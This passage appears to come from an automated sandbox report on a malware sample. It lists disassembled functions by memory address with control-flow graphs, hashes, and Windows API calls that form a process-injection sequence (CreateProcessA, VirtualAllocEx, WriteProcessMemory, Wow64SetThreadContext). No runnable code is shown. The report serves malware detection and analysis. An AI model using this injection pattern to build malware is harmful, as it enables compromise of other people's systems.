                                                        control_flow_graph 294 4c83e28-4c87004 call 4c874d0 call 4c85d84 call 4c85d94 310 4c87009-4c870cc 294->310 326 4c870db-4c870e2 310->326 327 4c870ce-4c870d3 310->327 328 4c870e8-4c87241 call 4c85da4 call 4c85db4 326->328 329 4c87242-4c872f5 326->329 327->326 344 4c8732a-4c87371 329->344 345 4c872f7-4c87327 329->345 346 4c8737a-4c87385 344->346 347 4c87373-4c87378 344->347 345->344 349 4c87388-4c87392 346->349 347->349 351 4c873ba-4c873be 349->351 352 4c87394-4c873b7 349->352 355 4c873c0-4c873c5 351->355 356 4c873c7-4c873d2 351->356 352->351 358 4c873d5-4c873f5 355->358 356->358 368 4c87416-4c8741a 358->368 369 4c873f7-4c87411 358->369 370 4c8741c-4c8742a 368->370 371 4c8748d-4c874b4 368->371 372 4c874bb-4c874c9 369->372 374 4c8742c-4c8745c 370->374 375 4c8745e-4c8748b 370->375 371->372 374->372 375->372
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1252359056.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 2dd$GWxt$\sq$d$d
                                                        • API String ID: 0-162291988
                                                        • Opcode ID: 54f4c9b6064da9b38a0160ca3b0d240e41af68feaf0d013a40d744835b28a05f
                                                        • Instruction ID: 943e52818aac2ef79ef206bc02f8206ea2ee7a5694f66b7d8781542a8290ae5b
                                                        • Opcode Fuzzy Hash: 54f4c9b6064da9b38a0160ca3b0d240e41af68feaf0d013a40d744835b28a05f
                                                        • Instruction Fuzzy Hash: FAF18C78A0030A9FDB14DF65D4946BEBBF2FF88304F109569C406EB390DB35A945CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04C87A09 Relevance: 2.8, Strings: 2, Instructions: 334COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 539 4c87a09-4c87b87 559 4c87b89-4c87bbf 539->559 560 4c87bc1-4c87bc3 539->560 559->560 561 4c87bc9-4c87bd3 560->561 562 4c87bc5-4c87bc7 560->562 564 4c87bd5-4c87beb 561->564 562->564 566 4c87bed-4c87bef 564->566 567 4c87bf1-4c87bf9 564->567 569 4c87bfb-4c87c00 566->569 567->569 570 4c87c02-4c87c0f 569->570 571 4c87c15-4c87c40 569->571 570->571 575 4c87c42-4c87c4e 571->575 576 4c87c76-4c87c80 571->576 575->576 577 4c87c50-4c87c5d 575->577 578 4c87c89-4c87d11 576->578 579 4c87c82 576->579 582 4c87c5f-4c87c61 577->582 583 4c87c63-4c87c70 577->583 589 4c87d53-4c87d61 578->589 590 4c87d13-4c87d51 578->590 579->578 582->576 583->576 593 4c87d6c-4c87da6 589->593 590->593 609 4c87da9 call 4c88a40 593->609 610 4c87da9 call 4c88a50 593->610 611 4c87da9 call 4c88af1 593->611 597 4c87daf-4c87e3c 602 4c87e6a-4c87e86 597->602 603 4c87e3e-4c87e68 597->603 606 4c87e88 602->606 607 4c87e94 602->607 603->602 606->607 609->597 610->597 611->597
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1252359056.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LRq$\sq
                                                        • API String ID: 0-576302416
                                                        • Opcode ID: 6959cc0ffb91b6924abaa632d76d6b67a677c5342cafd8c093e915534a999bc5
                                                        • Instruction ID: 4cac41dad5f9a9714fc62f39be5da32f64a8cb1d553022d74c31a2cf8b4713a8
                                                        • Opcode Fuzzy Hash: 6959cc0ffb91b6924abaa632d76d6b67a677c5342cafd8c093e915534a999bc5
                                                        • Instruction Fuzzy Hash: 90D1BD31E416298FDB14DF79D894AAEB7F2BFC8304B128569D406EB355DB30AD028F90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04C88D62 Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1252359056.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: 2877eef58bc5c08025f027aa44af096b9876564bacc7f315f7eab238e2df1fe5
                                                        • Instruction ID: e47f1f17d5b625fe6e3ebaa780d0ed0e462ef4dce2293007487abbd6a4db0bc9
                                                        • Opcode Fuzzy Hash: 2877eef58bc5c08025f027aa44af096b9876564bacc7f315f7eab238e2df1fe5
                                                        • Instruction Fuzzy Hash: 3851F035F102058FDB14EF69E8845AEBBB3FBC9214B59857AE509CB755DB30EC028B90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04C88A50 Relevance: .2, Instructions: 235COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1252359056.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 73c860e37e21264cde3b3623a866e053a74ae586a9a089546e1805d3674b635c
                                                        • Instruction ID: 9f22e39934508f797c81cc309c697b0a4e78570b8d01ae160ecba608ce7effdb
                                                        • Opcode Fuzzy Hash: 73c860e37e21264cde3b3623a866e053a74ae586a9a089546e1805d3674b635c
                                                        • Instruction Fuzzy Hash: BE817E32F102249FD714EB69D890B5EB7E3AFC8714F5A8169E409DB766DE34EC018B90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04C88AF1 Relevance: .2, Instructions: 188COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1252359056.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1931c29514199712f421d96b6348c9051194df12c034affbe2b48f92501ab5f5
                                                        • Instruction ID: 09a541934f334a385a64c4c8639cf3609cb219d7345d871944d8ca5715004da3
                                                        • Opcode Fuzzy Hash: 1931c29514199712f421d96b6348c9051194df12c034affbe2b48f92501ab5f5
                                                        • Instruction Fuzzy Hash: 6C615D32F106248FD754EB69CC80B5EB7E3AFC8714F5A8169E4059B76ADE34EC018B90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A50EE8 Relevance: .1, Instructions: 87COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1254531433.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6a50000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8f9fbe0809e45f726118d167a136fcb8dd25e995864453eae04111351b33318c
                                                        • Instruction ID: 5a5d505b437302162e032016d08ac2820bfc7efccc566741a8a6d2632dce8b2f
                                                        • Opcode Fuzzy Hash: 8f9fbe0809e45f726118d167a136fcb8dd25e995864453eae04111351b33318c
                                                        • Instruction Fuzzy Hash: DC31E5B0D04618CFEB58DFABC8443EEFAF6AFC9300F15C46AD819A6254DB7509468F90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A50EDB Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1254531433.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6a50000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0448ddfda534fd65f3b03947653733e9825aff17c1a9fb71ef0884f8196dd2af
                                                        • Instruction ID: 6a642d9c0ce7679a0e008f212442572fb7cdfe90ffa5eaa9162335b42abaf204
                                                        • Opcode Fuzzy Hash: 0448ddfda534fd65f3b03947653733e9825aff17c1a9fb71ef0884f8196dd2af
                                                        • Instruction Fuzzy Hash: 3A3108B0D046588FEB58DFA6C9443EEFFF6AF89300F15C46AD809AA254DB750949CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04C8F9E0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 377 4c8f9e0-4c8fa6f GetCurrentProcess 381 4c8fa78-4c8faac GetCurrentThread 377->381 382 4c8fa71-4c8fa77 377->382 383 4c8faae-4c8fab4 381->383 384 4c8fab5-4c8fae9 GetCurrentProcess 381->384 382->381 383->384 385 4c8faeb-4c8faf1 384->385 386 4c8faf2-4c8fb0a 384->386 385->386 390 4c8fb13-4c8fb42 GetCurrentThreadId 386->390 391 4c8fb4b-4c8fbad 390->391 392 4c8fb44-4c8fb4a 390->392 392->391
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 04C8FA5E
                                                        • GetCurrentThread.KERNEL32 ref: 04C8FA9B
                                                        • GetCurrentProcess.KERNEL32 ref: 04C8FAD8
                                                        • GetCurrentThreadId.KERNEL32 ref: 04C8FB31
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1252359056.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        • Opcode ID: 229ae51ae030916be3cb8d8a946055b412614817d8771cb2e7332922c439832d
                                                        • Instruction ID: 8c64d3d02d1c3f406b66d7a65dd00c557a4dea6c3639cf237c0b7025f7c64413
                                                        • Opcode Fuzzy Hash: 229ae51ae030916be3cb8d8a946055b412614817d8771cb2e7332922c439832d
                                                        • Instruction Fuzzy Hash: B35137B0D003099FEB14DFA9D548BAEBBF2FB88314F20845DE409A7360D775A945CB66
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A56B2C Relevance: 1.8, APIs: 1, Instructions: 252processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 612 6a56b2c-6a56bcd 614 6a56c06-6a56c26 612->614 615 6a56bcf-6a56bd9 612->615 620 6a56c5f-6a56c8e 614->620 621 6a56c28-6a56c32 614->621 615->614 616 6a56bdb-6a56bdd 615->616 618 6a56c00-6a56c03 616->618 619 6a56bdf-6a56be9 616->619 618->614 622 6a56bed-6a56bfc 619->622 623 6a56beb 619->623 631 6a56cc7-6a56d81 CreateProcessA 620->631 632 6a56c90-6a56c9a 620->632 621->620 624 6a56c34-6a56c36 621->624 622->622 625 6a56bfe 622->625 623->622 626 6a56c59-6a56c5c 624->626 627 6a56c38-6a56c42 624->627 625->618 626->620 629 6a56c44 627->629 630 6a56c46-6a56c55 627->630 629->630 630->630 633 6a56c57 630->633 643 6a56d83-6a56d89 631->643 644 6a56d8a-6a56e10 631->644 632->631 634 6a56c9c-6a56c9e 632->634 633->626 636 6a56cc1-6a56cc4 634->636 637 6a56ca0-6a56caa 634->637 636->631 638 6a56cac 637->638 639 6a56cae-6a56cbd 637->639 638->639 639->639 640 6a56cbf 639->640 640->636 643->644 654 6a56e20-6a56e24 644->654 655 6a56e12-6a56e16 644->655 657 6a56e34-6a56e38 654->657 658 6a56e26-6a56e2a 654->658 655->654 656 6a56e18 655->656 656->654 660 6a56e48-6a56e4c 657->660 661 6a56e3a-6a56e3e 657->661 658->657 659 6a56e2c 658->659 659->657 663 6a56e5e-6a56e65 660->663 664 6a56e4e-6a56e54 660->664 661->660 662 6a56e40 661->662 662->660 665 6a56e67-6a56e76 663->665 666 6a56e7c 663->666 664->663 665->666 668 6a56e7d 666->668 668->668
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06A56D6E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1254531433.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6a50000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 43d64a6e654255f5f7d8cbb651e1f5705ca91ea07380b18ba372924f2224b195
                                                        • Instruction ID: 92c94e789fe003a94a0462b6c2d1853ba8f97d8542852b6b5c1eddce66d941e7
                                                        • Opcode Fuzzy Hash: 43d64a6e654255f5f7d8cbb651e1f5705ca91ea07380b18ba372924f2224b195
                                                        • Instruction Fuzzy Hash: 33A17971D012198FEF64DF69C840BEEBBB2FF48310F058569E808A7250DB749981CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A56B38 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 669 6a56b38-6a56bcd 671 6a56c06-6a56c26 669->671 672 6a56bcf-6a56bd9 669->672 677 6a56c5f-6a56c8e 671->677 678 6a56c28-6a56c32 671->678 672->671 673 6a56bdb-6a56bdd 672->673 675 6a56c00-6a56c03 673->675 676 6a56bdf-6a56be9 673->676 675->671 679 6a56bed-6a56bfc 676->679 680 6a56beb 676->680 688 6a56cc7-6a56d81 CreateProcessA 677->688 689 6a56c90-6a56c9a 677->689 678->677 681 6a56c34-6a56c36 678->681 679->679 682 6a56bfe 679->682 680->679 683 6a56c59-6a56c5c 681->683 684 6a56c38-6a56c42 681->684 682->675 683->677 686 6a56c44 684->686 687 6a56c46-6a56c55 684->687 686->687 687->687 690 6a56c57 687->690 700 6a56d83-6a56d89 688->700 701 6a56d8a-6a56e10 688->701 689->688 691 6a56c9c-6a56c9e 689->691 690->683 693 6a56cc1-6a56cc4 691->693 694 6a56ca0-6a56caa 691->694 693->688 695 6a56cac 694->695 696 6a56cae-6a56cbd 694->696 695->696 696->696 697 6a56cbf 696->697 697->693 700->701 711 6a56e20-6a56e24 701->711 712 6a56e12-6a56e16 701->712 714 6a56e34-6a56e38 711->714 715 6a56e26-6a56e2a 711->715 712->711 713 6a56e18 712->713 713->711 717 6a56e48-6a56e4c 714->717 718 6a56e3a-6a56e3e 714->718 715->714 716 6a56e2c 715->716 716->714 720 6a56e5e-6a56e65 717->720 721 6a56e4e-6a56e54 717->721 718->717 719 6a56e40 718->719 719->717 722 6a56e67-6a56e76 720->722 723 6a56e7c 720->723 721->720 722->723 725 6a56e7d 723->725 725->725
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06A56D6E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1254531433.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6a50000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 8d20a4d208ead6b85edc69e35f085220ce1111831639ca952c34a6fe0d2f4bd2
                                                        • Instruction ID: 46cd59a10cdf2d43232081945704f8dda707df2f0fe3310b3ed14a995152ddf1
                                                        • Opcode Fuzzy Hash: 8d20a4d208ead6b85edc69e35f085220ce1111831639ca952c34a6fe0d2f4bd2
                                                        • Instruction Fuzzy Hash: 8F916771D013198FEF64DF69C840BEDBBB2FB48310F458569E808A7250DB749985CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04C844B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 726 4c844b0-4c859b9 CreateActCtxA 729 4c859bb-4c859c1 726->729 730 4c859c2-4c85a1c 726->730 729->730 737 4c85a2b-4c85a2f 730->737 738 4c85a1e-4c85a21 730->738 739 4c85a40 737->739 740 4c85a31-4c85a3d 737->740 738->737 742 4c85a41 739->742 740->739 742->742
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 04C859A9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1252359056.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: dc9003622aede940896e42a998de9b14ac1cab64feaff0fd9f257379154fb993
                                                        • Instruction ID: 856fa12c9fb009f0b51f9ad44777db313b727b0a9d047660e4210bbc19920ec1
                                                        • Opcode Fuzzy Hash: dc9003622aede940896e42a998de9b14ac1cab64feaff0fd9f257379154fb993
                                                        • Instruction Fuzzy Hash: D341B070C05719DFEB24DFA9C884BDDBBB6BF49304F20806AD408AB255DBB56946CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04C858EC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 743 4c858ec-4c859b9 CreateActCtxA 745 4c859bb-4c859c1 743->745 746 4c859c2-4c85a1c 743->746 745->746 753 4c85a2b-4c85a2f 746->753 754 4c85a1e-4c85a21 746->754 755 4c85a40 753->755 756 4c85a31-4c85a3d 753->756 754->753 758 4c85a41 755->758 756->755 758->758
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 04C859A9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1252359056.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: b5091159bf3b7afd76a92031690a1472bcee5aec5e468d8e155ade54766d506e
                                                        • Instruction ID: b9cf76774826e1ea6873b75efdc405670c7db66cc4108f8984e54368533f7ade
                                                        • Opcode Fuzzy Hash: b5091159bf3b7afd76a92031690a1472bcee5aec5e468d8e155ade54766d506e
                                                        • Instruction Fuzzy Hash: 9A41EFB0C04719DFEB24DFA9C8847DDBBB6BF49304F20806AD408AB255DB756946CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A56998 Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 759 6a56998-6a5699e 761 6a569a4-6a56a2d ReadProcessMemory 759->761 762 6a569a0-6a569a3 759->762 765 6a56a36-6a56a66 761->765 766 6a56a2f-6a56a35 761->766 762->761 766->765
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06A56A20
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1254531433.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6a50000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: 81c7b5ea80ef298e404ba2bf60ae9b7d67ba2a74f38de629f0f7025022dad520
                                                        • Instruction ID: b4e77c11a5f2924a2b4cbfb20ca01f6e3b4c2a3aa6fc60cae74cdf9a04dff49a
                                                        • Opcode Fuzzy Hash: 81c7b5ea80ef298e404ba2bf60ae9b7d67ba2a74f38de629f0f7025022dad520
                                                        • Instruction Fuzzy Hash: EC218875C003489FDB20DFAAC880BEEBFF4BF48210F51842EE919A7610C7389500CB65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A568A8 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 770 6a568a8-6a568fe 772 6a56900-6a5690c 770->772 773 6a5690e-6a5694d WriteProcessMemory 770->773 772->773 775 6a56956-6a56986 773->775 776 6a5694f-6a56955 773->776 776->775
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06A56940
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1254531433.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6a50000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: b02ee7e3a250ef98825f12f036c776d3d7d306cc84b1e324b2be7a6a02035e4b
                                                        • Instruction ID: e6111e80b2b616d3e375048ce806a4dcd01c91fe33b85ce6b57ecc0ad3ee054e
                                                        • Opcode Fuzzy Hash: b02ee7e3a250ef98825f12f036c776d3d7d306cc84b1e324b2be7a6a02035e4b
                                                        • Instruction Fuzzy Hash: 25213576D00349DFDB10DFA9C881BDEBBF1BF48310F10882AE958A7650C7789950CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A568B0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 780 6a568b0-6a568fe 782 6a56900-6a5690c 780->782 783 6a5690e-6a5694d WriteProcessMemory 780->783 782->783 785 6a56956-6a56986 783->785 786 6a5694f-6a56955 783->786 786->785
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06A56940
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1254531433.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6a50000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 5779192e1402191d39d2511143808559ce3a30ab5450a14c2a811772fd7f596d
                                                        • Instruction ID: 420bd0d1ac3cc9718d9df5dcdb28bbe979fd0c6bdc1821bab67de44afd3bf7df
                                                        • Opcode Fuzzy Hash: 5779192e1402191d39d2511143808559ce3a30ab5450a14c2a811772fd7f596d
                                                        • Instruction Fuzzy Hash: 7D211376D003499FDB10DFAAC881BDEBBF5BF48310F50842AE958A7250C7789940CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A562D8 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 790 6a562d8-6a5632b 793 6a5632d-6a56339 790->793 794 6a5633b-6a5636b Wow64SetThreadContext 790->794 793->794 796 6a56374-6a563a4 794->796 797 6a5636d-6a56373 794->797 797->796
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06A5635E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1254531433.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6a50000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 24026096f7e870ad4dd1dd8095e0966d12b59a4a0b69648e9a770d350b1c11db
                                                        • Instruction ID: 820c9906e8d7ea7b12c5420d0c4b1d67e763179f7dbdee98e9fefbda5b88779a
                                                        • Opcode Fuzzy Hash: 24026096f7e870ad4dd1dd8095e0966d12b59a4a0b69648e9a770d350b1c11db
                                                        • Instruction Fuzzy Hash: DE217871D003088FDB10DFAAC481BEEFBF4EF48224F14842AD419A7241C7789541CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A562E0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06A5635E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1254531433.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6a50000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 55defeba87d2db6ba6547139fb445c8f02fb4deaac7ef4c470d02e9ee0a12c93
                                                        • Instruction ID: 0cd69e10bee7cbcac853e01f297e3aa2406bc812d6726fa422229df90773abd8
                                                        • Opcode Fuzzy Hash: 55defeba87d2db6ba6547139fb445c8f02fb4deaac7ef4c470d02e9ee0a12c93
                                                        • Instruction Fuzzy Hash: FE213471D003088FDB14DFAAC485BEEBBF4AB48224F54842AD859A7240CB78A945CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A569A0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06A56A20
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1254531433.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6a50000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: ba8705238d079ba209630a3c5f895fcd2168c64cb4050207d149b84788782f18
                                                        • Instruction ID: c878ffec1d5c9174f8572fa38a008af63e0b1aac6c9a67c623521864e92da307
                                                        • Opcode Fuzzy Hash: ba8705238d079ba209630a3c5f895fcd2168c64cb4050207d149b84788782f18
                                                        • Instruction Fuzzy Hash: 87211671C003599FDB10DFAAC841BDEBBF5FF48310F50842AE958A7250D7799940CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A567E8 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06A5685E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1254531433.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6a50000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 70e6e9bc6ec262253e8610b6bf3314b0b0c317b3c8a65f54d8c86f22afda9ed3
                                                        • Instruction ID: f2dab55f1197756f998af5d30a7e51b27f60cfdf23fc9985650eb0b531c18337
                                                        • Opcode Fuzzy Hash: 70e6e9bc6ec262253e8610b6bf3314b0b0c317b3c8a65f54d8c86f22afda9ed3
                                                        • Instruction Fuzzy Hash: 7F113376C002089FDB24DFAAC845BDEBBF5AB88314F14841AE919A7250C7759540CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04C8CAD0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04C8DA19,00000800,00000000,00000000), ref: 04C8DC2A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1252359056.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 0ee82cb3aefdd8befaeebcf25388732be8e62caa8a36f7c6b3a724ff9555d8f8
